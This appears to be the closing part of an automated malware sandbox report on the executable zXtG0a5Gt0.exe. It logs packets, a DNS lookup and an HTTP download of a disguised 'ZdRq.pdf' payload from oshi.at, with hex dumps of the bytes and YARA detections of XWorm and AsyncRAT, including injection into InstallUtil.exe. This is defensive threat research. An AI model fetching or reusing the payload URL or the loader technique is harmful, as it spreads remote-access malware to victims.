                                                    Mar 7, 2025 15:48:54.159053087 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.159131050 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.159939051 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.159996986 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.165163994 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.165292025 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.168049097 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.168189049 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.169361115 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.169696093 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.173403025 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.173564911 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.174997091 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.175101042 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.176757097 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.177042961 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.208024025 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.208163023 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.208297014 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.208385944 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.208420992 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.208493948 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.258106947 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.258208990 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.258271933 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.258281946 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.258335114 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.262341976 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.262451887 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.262460947 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.262501001 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.293145895 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.293301105 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.294083118 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.294313908 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.297744036 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.297874928 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.299648046 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.299778938 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.303275108 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.303396940 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.305327892 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.305407047 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.307161093 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.307254076 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.310898066 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.310986996 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.316092968 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.316231012 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.318808079 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.318885088 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.320749998 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.320812941 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.322498083 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.322561026 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.326237917 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.326307058 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.328198910 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.328267097 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.331770897 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.331836939 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.333805084 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.333868980 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.337518930 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.337762117 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.460843086 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.461251020 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.463363886 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.463445902 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.470712900 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.470756054 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.470782995 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.470791101 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.470974922 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.472546101 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.472737074 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.476608038 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.476708889 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.478205919 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.478507042 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.480065107 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.480146885 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.483809948 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.483895063 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.485786915 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.485856056 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.489427090 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.489518881 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.491235018 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.491349936 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.493562937 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.493669987 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.496818066 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.496968985 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.498753071 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.498886108 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.502479076 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.502979994 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.504357100 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.504487038 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.508059025 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.508182049 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.509929895 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.510010004 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:54.510021925 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.510065079 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:54.516329050 CET49717443192.168.2.4194.15.112.248
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 7, 2025 15:48:47.529319048 CET6165653192.168.2.41.1.1.1
                                                    Mar 7, 2025 15:48:47.543452024 CET53616561.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 7, 2025 15:48:47.529319048 CET192.168.2.41.1.1.10x7df6Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 7, 2025 15:48:47.543452024 CET1.1.1.1192.168.2.40x7df6No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                    • oshi.at
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449717194.15.112.2484437912C:\Users\user\Desktop\zXtG0a5Gt0.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 14:48:50 UTC186OUTGET /wacv HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: oshi.at
                                                    Connection: Keep-Alive
                                                    2025-03-07 14:48:51 UTC308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Fri, 07 Mar 2025 14:48:50 GMT
                                                    Content-Type: application/pdf
                                                    Content-Length: 1028104
                                                    Connection: close
                                                    ETag: "5264622aa5aefd111f0445ca8f140420"
                                                    Last-Modified: Tue, 14 Jan 2025 07:47:37 GMT
                                                    Content-Disposition: attachment; filename=ZdRq.pdf
                                                    Accept-Ranges: bytes
                                                    2025-03-07 14:48:51 UTC3775INData Raw: 4c 92 61 0d 0c 85 ce b8 41 37 f8 97 7a 90 2b 34 40 d7 39 b7 21 0e f7 ef f0 b3 8b 6a 5b 3a 3c fe 11 38 8d 69 f9 df 5f 78 9b 09 36 5f 01 95 b9 aa 98 37 99 5e a2 00 78 44 b9 8c 3c d7 cd c4 90 8d ab 44 a2 cc a9 29 e7 3d f5 8f ac f3 3d a1 5c 6c 32 c0 0a 26 21 77 32 b2 84 f5 77 8b e1 42 3e 13 f2 3d 1c 46 7c 47 62 b4 00 1f dd 7a 3b 15 15 99 25 18 bb 14 70 6c 05 13 78 b0 a8 d5 3f 16 2b 59 76 1b b8 4d c7 32 79 20 f4 91 41 cd 29 24 4f bf 8e 3c 44 ea 3d 4d 96 bc ad 19 29 ae 6d b6 49 dc 3c 0b bf 1b 7b b7 be 98 98 90 36 3f f6 c7 23 d1 b6 66 3f 2e 40 af 6d ef d4 a3 e1 00 b7 a1 24 16 5b 10 e3 b0 92 eb 91 42 7e db c9 39 35 dc 03 34 86 16 be ec 8d af 0e ae 7b 8e c6 ad ef 49 00 1b b8 95 f1 cc 95 58 a8 28 2d b5 78 91 4c 62 68 40 07 ec 93 02 2b 54 02 be 4e 15 4f 00 ae a3 a0
                                                    Data Ascii: LaA7z+4@9!j[:<8i_x6_7^xD<D)==\l2&!w2wB>=F|Gbz;%plx?+YvM2y A)$O<D=M)mI<{6?#f?.@m$[B~954{IX(-xLbh@+TNO
                                                    2025-03-07 14:48:51 UTC4096INData Raw: e2 e1 e0 80 e7 c1 58 3c b4 1f 29 25 a8 b1 a0 49 1c b3 46 92 cb 50 8a b8 d0 61 47 0d 44 f4 77 e6 75 94 7c 05 fa 0b 1c f5 af 5c 8f 6a c1 69 80 0f 25 b0 2a 47 18 9d 70 6c 85 e0 ba 6f 02 4a be c2 92 30 44 46 e1 13 18 0c 26 59 b9 e9 00 d3 08 83 15 24 7f dc 8f 74 e4 a6 cf 6f 05 18 99 6c e1 cb a4 4b b6 0b 51 a5 05 a6 e5 b9 98 48 17 5f 28 06 53 52 ef 60 33 29 b7 0a d1 3e dc b0 0c 79 03 a4 1d c8 c8 5c 5a 41 0e c2 c9 0d aa 56 e8 c9 2e 9f 35 8d 8e 6c c6 07 f1 34 3f ce 49 31 da 5d 42 3a e3 03 9d 32 f9 1a 08 db 4d 20 30 35 90 18 4a 92 e0 ec 9d f7 62 99 a0 da 29 e1 8c 48 e8 a7 1c 4c d1 f2 42 97 dc c7 32 7a 4c 1f 3d 91 ee eb 9b 30 ce 99 59 ee 81 fc dd dd 83 11 49 ef cb b3 6c 47 2a d9 a7 37 fb dc f6 f5 21 b5 b6 8a 92 c0 bd 10 49 7f 9e 2b 0e 66 36 71 6a 59 ee 42 41 a6 52
                                                    Data Ascii: X<)%IFPaGDwu|\ji%*GploJ0DF&Y$tolKQH_(SR`3)>y\ZAV.5l4?I1]B:2M 05Jb)HLB2zL=0YIlG*7!I+f6qjYBAR
                                                    2025-03-07 14:48:51 UTC4096INData Raw: 74 49 ad db 06 56 dd 2e aa c5 e1 40 fc 71 02 a1 92 49 e9 98 56 d0 7b 0a 29 f8 8f 33 70 a3 06 ec c6 89 aa fb cb ff d5 43 79 f6 cf a8 44 7b bb 53 f7 d5 23 81 1d b7 a1 70 99 03 2d 10 8f 79 f7 0c a0 00 9e f1 00 5a f2 f4 7d e4 97 47 21 10 b4 35 af c8 80 b6 8d 61 a5 ea 29 e5 f5 af 05 88 e5 00 4b 8d 24 e0 94 f4 02 cd 08 ab 2a d0 58 bd b4 5a 94 a1 46 ff 18 06 ad ae ba 9a 3f f4 3f b8 84 b6 ad 06 88 f3 26 a6 94 ed 86 c4 31 e2 c6 27 a0 5f 71 4a 85 f4 5f 8d 25 07 b6 a4 30 be af 97 03 2d 61 42 da d8 53 11 29 d5 0b 82 8d 42 f4 c2 67 ca da 5f a5 4d cf 6b bf 30 93 66 4c 80 7e 58 b8 3f c1 c9 cf 3f 4d e7 8c 75 eb 7f 46 40 df 4f 20 98 34 fd bc 97 cc 61 ad 9a fb 3b 06 c2 c0 19 ae e3 68 ec fb 26 28 ea 1b 24 96 6b fd 73 c7 9a 31 54 9d d3 cd a7 82 6d 30 78 54 f1 94 cd bb 7c 6b
                                                    Data Ascii: tIV.@qIV{)3pCyD{S#p-yZ}G!5a)K$*XZF??&1'_qJ_%0-aBS)Bg_Mk0fL~X??MuF@O 4a;h&($ks1Tm0xT|k
                                                    2025-03-07 14:48:51 UTC4096INData Raw: 48 52 47 44 78 f8 5a c2 2f 06 fd bb 52 9d 91 8a a0 99 b7 79 bd 47 09 4a e5 ca d9 98 44 9c 04 fe 14 25 ed 5a fb 88 a1 89 77 9c 7f 10 a5 b6 55 79 d2 48 5a 8f c5 f0 f9 53 f6 cc 30 0c d2 e7 04 06 02 6e 10 f8 9b c1 00 94 3f 8f 11 55 ad 8c 32 23 1a 3c a3 56 78 eb 86 6d 39 44 b8 28 75 84 7f d1 c6 6a b6 3c 37 5b 8e c1 f2 39 f8 44 65 70 4a c1 00 8c c1 0d 5e b3 fd 83 0c 93 c6 df 9c 14 ba f5 18 6a d2 69 89 d7 26 6c 1e 49 ea ee 79 4e 10 1f bc bc fa 60 37 e6 ec 03 67 ae ed 7d 08 6e 22 64 8e 40 2b 61 a2 45 3c 42 82 72 91 13 4f 1d 64 8b c6 58 7c 8f 0e d3 c8 59 38 d1 44 7a cf ff 67 b6 01 a3 4c 7f 7f 68 70 76 1a fb 3e 78 bc e9 e7 5f ef b3 24 f2 b3 a1 94 cb 40 c1 9e cd b9 b2 65 5f 1e 69 0b ed b2 20 25 22 af 25 a8 c4 8b f1 31 d9 28 41 61 5f 64 13 3e 06 98 08 24 ae 51 ec b7
                                                    Data Ascii: HRGDxZ/RyGJD%ZwUyHZS0n?U2#<Vxm9D(uj<7[9DepJ^ji&lIyN`7g}n"d@+aE<BrOdX|Y8DzgLhpv>x_$@e_i %"%1(Aa_d>$Q
                                                    2025-03-07 14:48:51 UTC4096INData Raw: a4 08 e7 46 54 f1 e0 e3 aa 77 7e 89 19 06 e4 fd 41 34 01 59 ec b3 d4 c2 3a 86 37 03 fe 50 77 7a e5 e0 86 8a 16 bd 87 aa 56 63 7f 55 92 65 76 71 26 b3 d0 4d e7 7b 99 a6 a2 c3 f8 16 e7 b0 11 1a dd 7d c6 d6 53 b1 60 89 ba 62 a0 7d 3d 89 99 58 6f 6c 1e c6 d4 2e 02 1a a4 7d 41 21 bf 33 3f 80 f1 1f 8c 07 81 5c 81 78 d2 6a 4d 99 81 f4 5a ac 9b 2a e3 06 35 3b 4a 6d 99 60 8e 63 da 60 b7 dd bf 8a a2 99 2d c1 81 2b 79 6a 96 c9 d9 3a f3 e2 d0 f3 aa f5 4e 8a 04 59 06 32 53 1b 70 0b 1b 0f 99 76 86 f9 b9 10 28 76 8c b4 37 d0 11 b3 a3 27 5e 79 6e 27 92 a7 ec 12 fb c4 90 01 96 b7 bc d3 43 d0 1e 8d b8 2f 26 5e f8 5f 67 cc b0 6e d6 f4 3b 89 11 ca 3d 2f af b0 04 bd 04 6a f8 b3 b6 4e b0 54 2b 03 d3 01 6c 7d 66 f8 ca 47 00 e2 38 6a b1 2c 31 c7 f6 96 6f b9 83 8c c5 4b ee 15 8b
                                                    Data Ascii: FTw~A4Y:7PwzVcUevq&M{}S`b}=Xol.}A!3?\xjMZ*5;Jm`c`-+yj:NY2Spv(v7'^yn'C/&^_gn;=/jNT+l}fG8j,1oK
                                                    2025-03-07 14:48:51 UTC4096INData Raw: ae 05 22 f8 72 99 cb 51 69 01 0b 7a 9d 8c d1 75 ea 24 9c 94 b0 76 6c e9 a5 68 d5 6a 0d 17 17 7a a2 1e c2 85 c3 1c 7e 8a 3c 63 01 ea 36 36 41 13 06 ce 9d bc 54 39 35 9a 6f f9 20 c8 b2 41 29 a7 a5 bc 7d ef d8 ee a5 ca 3a ab 25 e1 75 19 e9 70 2c 40 81 2f 96 cf 7e 7a d9 2d 60 bc 85 c9 d7 d6 40 5c 75 12 6f be 26 22 7b 71 17 c5 0a fc 90 ec 07 60 59 64 3f ae 5f ba 30 55 26 92 27 ce ca 8d 52 d3 6b c1 63 11 e0 9b eb 9b 5a 77 84 9b 0b b9 94 f1 dc fa ec 85 24 bf 80 fe d0 c8 6e 54 ef 20 25 d2 fa 0d 0b e3 25 b4 a1 0c 5e 89 89 e4 d4 49 bd 70 7d 9c 67 76 c7 01 d4 7c 7b a0 ae 2e 21 02 1e 70 80 f3 e7 90 2a 64 fd 1a 28 da c9 9e f4 3e 13 e4 bd 3c a9 ed 8f 3e e7 ad f9 c7 06 d5 40 77 19 2f 5a 19 b8 5e 3c a8 16 60 b8 f4 bc 5d 81 fb 70 60 dd ac 2d 53 a8 36 ef 1d 35 fa f7 1a d6
                                                    Data Ascii: "rQizu$vlhjz~<c66AT95o A)}:%up,@/~z-`@\uo&"{q`Yd?_0U&'RkcZw$nT %%^Ip}gv|{.!p*d(><>@w/Z^<`]p`-S65
                                                    2025-03-07 14:48:51 UTC4096INData Raw: 42 e9 0c 67 1e 0e 13 73 87 79 0d df 03 39 3a 3d 78 f4 39 d2 2c 45 6f 3a 0d 0d bc 1c 2c c0 e6 4f 4a 71 76 76 6b e9 73 9d 09 22 de 5a 8c bf 69 6d dc 6d c9 8c 5d cb 4d 60 99 a0 d2 35 7e 25 f4 b7 f4 ed ad 07 9b 48 23 d7 2e e6 8f 3b 9f e9 45 75 9a 7a 07 80 c9 6b c8 cf 02 ae 93 88 cf 91 cc 91 1f 75 d8 36 ea 30 02 e4 5a 34 ea dc f8 a0 4b b1 e0 a1 bf 4e 99 66 5e 11 c2 88 c4 b7 4b ce 9e 96 77 3a 04 e5 27 e5 02 4c 80 be 0d 76 af 7e 20 c8 31 80 28 da 56 e3 a5 5f 24 a9 00 5f db ef d5 d7 27 54 43 e5 12 7b 0a 30 a2 ed 90 18 71 d3 98 a9 81 d1 19 65 2b 09 ed b6 b6 95 2c 44 12 94 21 f2 b0 08 48 4b 6c ba b8 15 68 c1 23 0f 86 2d f5 54 83 34 c5 7b 32 84 1f 22 4d cb ed 9b aa 47 54 f3 61 d5 48 4c ad 5d cf d6 3e 3a 13 d2 bc 06 3a 11 59 1b 65 9c 82 f2 56 f1 e2 d0 97 bd 72 ff 15
                                                    Data Ascii: Bgsy9:=x9,Eo:,OJqvvks"Zimm]M`5~%H#.;Euzku60Z4KNf^Kw:'Lv~ 1(V_$_'TC{0qe+,D!HKlh#-T4{2"MGTaHL]>::YeVr
                                                    2025-03-07 14:48:51 UTC4096INData Raw: 88 d8 45 0d 89 bd bc 5e 19 8d a4 9b a4 1b 17 58 27 d1 75 4f 53 dd 9d b5 89 20 94 2a d5 a6 ea 61 99 a5 ca cf d8 6f 02 4a 1a e3 7d 17 8a be 3d 4e 39 83 c8 9f 41 ba d4 43 d0 fa 00 d4 ac 68 78 b0 62 41 cc 16 63 66 05 fa f1 c7 43 fd 15 08 30 c9 06 b1 f5 f3 0a a3 9c 67 d3 00 d6 68 a5 81 e9 02 ed 62 aa aa 31 50 0b e5 af 27 9b 1c 67 46 87 2d c7 3e 2a 9d a4 33 f7 10 2f 3d 49 78 72 44 a8 c9 e8 15 2d c1 e9 ee b3 72 21 f4 1c bb 04 9f a3 e8 77 85 8f 14 76 68 93 7c 2f 32 3b 7b 33 3b ad 77 e5 66 41 79 f7 96 9e c4 df 2b 13 d2 3b 80 9c a9 31 a5 21 15 f6 89 d4 37 47 0b 1b 39 44 9d 8e 3c 44 23 52 56 a5 ff 0e e0 e0 b8 0f 1b 75 03 04 9e eb f9 3d b6 b9 da e4 fc d4 6e 06 0b b2 4f 68 2d de c9 a0 87 da d3 20 cf 7d 74 2e c5 8b ad 90 f5 71 1b b1 15 bf 83 aa 77 42 a8 51 d9 a3 29 80
                                                    Data Ascii: E^X'uOS *aoJ}=N9AChxbAcfC0ghb1P'gF->*3/=IxrD-r!wvh|/2;{3;wfAy+;1!7G9D<D#RVu=nOh- }t.qwBQ)
                                                    2025-03-07 14:48:51 UTC676INData Raw: 6f fd ca 3a a8 76 06 d4 89 e0 37 ad d6 36 99 58 4a 73 57 a6 16 c8 f9 18 fa 8f 08 b4 ca 9c ac 92 78 98 f2 09 09 f6 56 0b b6 bc 05 cc ed 3f 36 2d 7f 78 44 ed b5 61 52 d3 b8 6b 16 11 ae 17 b8 e3 27 7c 14 23 22 4f 5a 90 af f5 c4 43 09 82 13 89 79 1e a0 89 95 0e 85 26 1b f5 2d 2e 63 38 72 8a fb 73 93 c0 16 78 a1 27 0b 40 e4 76 50 2a 2d 32 37 95 81 55 99 21 9e 51 a5 ac 51 0d be cc 33 b7 2a 95 29 57 8a 73 4a 8f 9c fa ad ea ed 4f 23 14 99 d9 0a 6c a7 70 67 3f 9f a4 f4 b3 00 aa 41 10 6c 02 b3 f7 7c 55 dc c5 02 bd 7b 60 19 ba 27 5f ca f1 60 8b 59 8c 77 4e 87 81 c1 ca 88 a3 48 a8 8f b6 de 4f e8 a4 86 cc 19 de 63 ae e8 5a 4c cc f5 98 76 f5 fa 43 e6 d7 af 50 d8 29 d9 3b 5f 24 40 7d b9 97 88 3b 5f c2 d9 61 4b 95 9f 53 b3 d9 e4 cd f3 e7 14 d4 85 5e 2e b4 65 ed 18 9e 80
                                                    Data Ascii: o:v76XJsWxV?6-xDaRk'|#"OZCy&-.c8rsx'@vP*-27U!QQ3*)WsJO#lpg?Al|U{`'_`YwNHOcZLvCP);_$@};_aKS^.e
                                                    2025-03-07 14:48:51 UTC4096INData Raw: 1c 4d 15 7b 7e cb 8e df d5 bc 58 1f bc 24 d5 8a fd 0f 6c e5 97 f3 d4 4d 08 f6 9e 10 ad 70 77 48 e9 b5 e5 72 00 49 fb 16 1f a2 72 3d 21 59 fe d4 ee f1 55 4c 11 38 c8 72 f6 58 07 80 d3 7e a1 b6 c0 8a c7 55 71 f8 d1 e5 11 aa b0 9b ad 0c b1 59 42 76 73 65 7d c0 2a e0 bb ae a3 ff ae e2 2c e7 44 81 97 9e ec 9e f0 72 90 81 8d 15 de 3e 98 e7 7e 16 fa 6b 40 72 9e 25 8d 9d db 99 1e a2 3a 0b 97 8e 67 00 45 2b 88 dd ee c4 cb 86 dc 9c f9 df 2c ee 93 c2 b8 1a 66 e5 21 85 63 04 50 b1 c9 b7 63 ee 87 68 45 c5 ef 7b c3 de e2 6c 5b 4d a0 fe 48 2f 3c 01 64 f7 4c 20 a5 ff 35 df 1e 3b 65 b5 80 c6 0d 5b 7b e5 88 9c d3 5c ad e2 f0 db 93 23 a6 01 6c 21 1b c2 5c 4f 57 6e 0b 55 55 22 53 86 3b 25 51 63 8d 10 32 72 2c 6e af 57 16 ae 6a d8 11 74 08 f6 65 37 bf f7 80 20 a8 4b c1 1a 34
                                                    Data Ascii: M{~X$lMpwHrIr=!YUL8rX~UqYBvse}*,Dr>~k@r%:gE+,f!cPchE{l[MH/<dL 5;e[{\#l!\OWnUU"S;%Qc2r,nWjte7 K4


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:1
                                                    Start time:09:48:46
                                                    Start date:07/03/2025
                                                    Path:C:\Users\user\Desktop\zXtG0a5Gt0.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\zXtG0a5Gt0.exe"
                                                    Imagebase:0x2b0000
                                                    File size:65'656 bytes
                                                    MD5 hash:89757CE41562CF1C80DBC27625D64CBB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1370075880.0000000006150000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1365290075.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:09:48:55
                                                    Start date:07/03/2025
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                    Imagebase:0xa30000
                                                    File size:42'064 bytes
                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:09:48:58
                                                    Start date:07/03/2025
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 908
                                                    Imagebase:0xfc0000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >